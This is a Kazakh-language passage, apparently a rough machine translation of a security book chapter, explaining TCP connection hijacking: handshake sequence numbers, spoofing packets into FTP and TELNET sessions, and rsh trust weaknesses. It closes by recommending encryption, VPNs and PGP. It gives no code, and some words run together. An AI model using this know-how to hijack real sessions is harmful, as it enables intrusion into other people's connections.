Ұстаудың жоғарыда келтірілген мысалдары (шабуылдаушылардың мүмкіндіктері шектеулі емес) егер деректерде құпия ақпарат болса, желі арқылы берілетін деректерді қорғау қажеттілігіне сендіреді. Желілік трафикті ұстап қалудан қорғаудың жалғыз әдісі криптографиялық алгоритмдер мен шифрлау хаттамаларын жүзеге асыратын және құпия ақпараттың ашылуы мен ауыстырылуына жол бермейтін бағдарламаларды пайдалану болып табылады. Осындай мәселелерді шешу үшін криптография шифрлау, қол қою және қауіпсіз хаттамалар арқылы жіберілетін хабарламалардың түпнұсқалығын тексеру құралдарын ұсынады.

4-тарауда сипатталған ақпарат алмасуды қорғаудың барлық криптографиялық әдістерін іс жүзінде іске асыру VPN (Виртуалды жеке желі) желілерімен қамтамасыз етілген. Криптографиялық қауіпсіздік принциптері мен әдістеріне қысқаша шолуды Е қосымшасынан табуға болады және толық сипаттама PGP Desktop Security қолданбасы (http://www.pgp.com) қамтамасыз ететін криптографиялық қорғау құралдары.

TCP қосылымын тоқтату

TCP қосылымын ұрлау шабуылдарын орындау үшін бірнеше тиімді утилиталар жасалды, бірақ олардың барлығы Unix платформасы үшін жүзеге асырылады, ал веб-сайттарда бұл утилиталар тек бастапқы код түрінде ұсынылады. Осылайша, бұзудың асыл себебіне сенімді тәжірибешілер ретінде TCP қосылымын тоқтату әдісін қолданатын шабуылдар бізге көп пайда әкелмейді. (Басқалардың бағдарлама кодын түсінгісі келетіндер http://www.cri.cz/~kra/index.html сайтына жүгіне алады, оны жүктеп алуға болады. көзіПавел Крауздың белгілі Hunt TCP қосылымын тоқтату утилитасы).

Практикалық құралдардың жоқтығына қарамастан, біз TCP қосылымдарын ұстау сияқты қызықты тақырыпты елемеуге болмайды және біз мұндай шабуылдардың кейбір аспектілеріне тоқталамыз. TCP пакетінің құрылымы және TCP қосылымдарын орнату тәртібі туралы кейбір ақпарат осы кітаптың D қосымшасында берілген, бірақ бұл жерде біз сұраққа тоқталамыз - хакерлерге TCP қосылымын ұстап қалу шабуылдарын жүзеге асыруға нақты не мүмкіндік береді? Бұл тақырыпты толығырақ қарастырайық, негізінен және ішіндегі талқылауға сүйене отырып.

TCP протоколы (Transmission Control Protocol) виртуалды байланыс арнасы арқылы логикалық қосылымдарды орнатуға мүмкіндік беретін OSI тасымалдау деңгейінің негізгі протоколдарының бірі болып табылады. Бұл арна арқылы пакеттер жіберіледі және қабылданады, олардың реттілігі жазылады, пакеттер ағыны бақыланады, бұрмаланған пакеттерді қайта жіберу ұйымдастырылады, сессияның соңында байланыс арнасы бұзылады. TCP протоколы TCP/IP отбасындағы хабарларды сәйкестендіру және қосылудың кеңейтілген жүйесі бар жалғыз негізгі протокол болып табылады.

TCP пакетін анықтау үшін TCP тақырыбында екі 32 разрядты идентификатор бар, олар сонымен қатар реттік нөмір және растау нөмірі деп аталатын пакеттік есептегіштер қызметін атқарады. Бізді TCP пакетінің басқару биттері деп аталатын тағы бір өрісі қызықтырады. Бұл 6 разрядты өріс келесі басқару биттерін қамтиды (солдан оңға қарай ретімен):

URG - жеделдік туы;

ACK – растау жалауы;

PSH - тасымалдау жалауы;

RST - қосылымды қалпына келтіру жалауы;

SYN - синхрондау жалауы;

FIN – қосылымды тоқтату жалаушасы.

TCP қосылымын құру процедурасын қарастырайық.

1. Егер A хостына B хостымен TCP қосылымын жасау қажет болса, онда А хосты В хостына келесі хабарламаны жібереді:

A -> B: SYN, ISSa

Бұл A хосты жіберген хабарламада SYN жалауы (Синхрондау реттік нөмірі) орнатылғанын және реттік нөмір өрісі бастапқы 32-биттік ISSa (Бастапқы реттік нөмір) мәніне орнатылғанын білдіреді.

2. А хостынан алынған сұрауға жауап ретінде B хосты SYN биті орнатылған және ACK биті орнатылған хабарламамен жауап береді. Реттік нөмір өрісінде B хосты өзінің бастапқы есептегіш мәнін орнатады - ISSb; растау нөмірі өрісінде A хостынан бірінші пакетте алынған ISSa мәні болады, ол біреуге артады. Сондықтан B хосты мына хабарламамен жауап береді:

B -> A: SYN, ACK, ISSb, ACK(ISSa+1)

3. Соңында А хосты В хостына хабарлама жібереді, онда: ACK биті орнатылған; реттік нөмір өрісі ISSa + 1 мәнін қамтиды; Растау нөмірі өрісінде ISSb + 1 мәні бар. Осыдан кейін A және B хосттары арасындағы TCP байланысы орнатылған болып саналады:

A -> B: ACK, ISSa+1, ACK(ISSb+1)

4. Енді A хосты деректер пакеттерін В хостына жаңадан жасалған виртуалды TCP арнасы арқылы жібере алады:

A -> B: ACK, ISSa+1, ACK(ISSb+1); ДЕРЕКТЕР

Мұнда DATA деректерді білдіреді.

Жоғарыда қарастырылған TCP қосылымын құру алгоритмінен TCP абоненттерінің және TCP қосылымының жалғыз идентификаторлары реттік нөмір мен растау нөмірінің екі 32 разрядты параметрі - ISSA және ISSb екенін көруге болады. Сондықтан, егер хакер ISSa және ISSb өрістерінің ағымдағы мәндерін анықтай алса, онда оған жалған TCP пакетін жасауға ештеңе кедергі болмайды. Бұл хакерге тек берілген TCP қосылымы үшін TCP пакетінің ISSA және ISSb параметрлерінің ағымдағы мәндерін таңдауы, пакетті осы TCP қосылымының клиенті атынан кез келген Интернет хостынан және осы пакеттен жіберу керек дегенді білдіреді. дұрыс деп қабылданады!

Мұндай TCP дестелерінің спуфингінің қауіптілігі де маңызды, өйткені жоғары деңгейлі FTP және TELNET хаттамалары TCP протоколы негізінде жүзеге асырылады, ал FTP және TELNET пакеттік клиенттерін идентификациялау толығымен TCP протоколына негізделген.

Сонымен қатар, FTP және TELNET хаттамалары хабарлама жіберушілердің IP мекенжайларын тексермейтіндіктен, жалған пакетті алғаннан кейін FTP немесе TELNET серверлері жалған пакетте көрсетілген хакер хостының IP мекенжайына жауап хабарламасын жібереді. Осыдан кейін хакер хост өзінің IP мекенжайынан FTP немесе TELNET серверімен жұмыс істей бастайды, бірақ заңды түрде қосылған пайдаланушының құқықтарымен жұмыс істей бастайды, ол өз кезегінде есептегіштердің сәйкес келмеуі салдарынан сервермен байланысын жоғалтады.

Осылайша, жоғарыда сипатталған шабуылды жүзеге асыру үшін қажетті және жеткілікті шарт - TCP қосылымын анықтайтын екі ағымдағы 32 биттік ISSa және ISSb параметрлерін білу. қарастырайық мүмкін жолдарыоларды қабылдау. Хакер хосты шабуылдалған желі сегментіне қосылған жағдайда, ISSa және ISSb мәндерін алу міндеті тривиальды болып табылады және оны желілік трафикті талдау арқылы шешуге болады. Сондықтан, TCP протоколы, негізінен, шабуылдаушы жіберілген хабарламаларды ұстап алу мүмкін болмаса ғана қосылымды қорғауға мүмкіндік беретінін нақты түсіну керек. бұл байланыс, яғни хакер хосты TCP қосылымының абоненттік сегментінен өзгеше желі сегментіне қосылған жағдайда ғана.

Сондықтан, шабуылдаушы мен оның нысанасы әртүрлі желі сегменттерінде болған кезде сегментаралық шабуылдар хакер үшін үлкен қызығушылық тудырады. Бұл жағдайда ISSA және ISSb мәндерін алу міндеті маңызды емес. Бұл мәселені шешу үшін қазір тек екі әдіс ойлап табылды.

ISSA және ISSb алдыңғы мәндерін экстраполяциялау арқылы TCP қосылым параметрлерінің бастапқы мәнін математикалық болжау.

Unix rsh серверлеріндегі TCP қосылымының жазылушыларын анықтаудағы осалдықтарды пайдалану.

Бірінші тапсырма TCP хаттамасын әр түрлі енгізуді терең зерттеу арқылы шешіледі операциялық жүйелержәне қазір таза теориялық мәнге ие. Екінші мәселе осалдықтарды қолдану арқылы шешіледі Unix жүйелерісенімді хосттарды анықтау арқылы. (Берілген A хостына қатысты сенімді B желілік хосты болып табылады, оның пайдаланушысы A хостының r-қызметінің көмегімен аутентификациясыз А хостына қосыла алады). TCP пакеттерінің параметрлерімен манипуляциялау арқылы хакер сенімді хостқа еліктеуге және шабуыл жасалған хостпен TCP қосылымын үзуге әрекет жасай алады.

Мұның бәрі өте қызықты, бірақ мұндай зерттеулердің практикалық нәтижелері әлі көрінбейді. Сондықтан біз осы тақырыпты тереңірек зерттегісі келетіндердің барлығына жоғарыда келтірілген ақпарат негізінен алынған кітапқа жүгінуге кеңес береміз.

Қорытынды

Желілік деректерді ұстап алу - хакерге желіде айналатын барлық дерлік ақпаратты алуға мүмкіндік беретін желіні бұзудың ең тиімді әдісі. Ең үлкен практикалық дамуға иіскеу құралдары арқылы қол жеткізілді, яғни. желілерді тыңдау; Дегенмен, трафикті хакер хостына қайта бағыттау үшін желінің қалыпты жұмысына кедергі жасау арқылы орындалатын желілік деректерді ұстап алу әдістерін, әсіресе TCP қосылымдарын ұстау әдістерін елемеуге болмайды. Алайда, іс жүзінде соңғы аталған әдістер әлі жеткілікті түрде дамымаған және жетілдіруді қажет етеді.

Антихакер деректерді ұстап алудан жалғыз құтқару оның шифрлау екенін білуі керек, яғни. криптографиялық қорғау әдістері. Желі арқылы хабарлама жіберген кезде желінің кабельдік жүйесі мүлдем осал деп алдын ала болжау керек және желіге қосылған кез келген хакер одан барлық жіберілген құпия хабарламаларды ұстай алады. Бұл мәселені шешудің екі технологиясы бар - VPN желісін құру және хабарламалардың өзін шифрлау. Бұл тапсырмалардың барлығын PGP Desktop Security бағдарламалық пакетін пайдалану арқылы шешу өте оңай (оның сипаттамасын, мысалы, мына жерден табуға болады).

Санаттағы танымал: